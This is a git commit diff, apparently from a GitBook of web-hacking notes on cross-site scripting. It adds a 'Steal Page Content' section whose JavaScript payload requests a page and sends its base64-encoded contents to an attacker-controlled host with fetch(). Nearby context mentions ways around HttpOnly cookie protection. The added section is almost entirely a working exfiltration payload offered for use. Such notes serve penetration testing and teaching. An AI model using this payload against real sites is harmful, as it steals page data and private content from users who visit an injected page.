GitBook: [master] one page modified
This commit is contained in:
parent
4173317450
commit
06fbf24691
|
@ -685,6 +685,21 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
|
|||
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
|
||||
{% endhint %}
|
||||
|
||||
### Steal Page Content
|
||||
|
||||
```javascript
|
||||
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
|
||||
var attacker = "http://10.10.14.8/exfil";
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
|
||||
}
|
||||
}
|
||||
xhr.open('GET', url, true);
|
||||
xhr.send(null);
|
||||
```
|
||||
|
||||
### Port Scanner \(fetch\)
|
||||
|
||||
```javascript
|
||||
|
|
Loading…
Reference in New Issue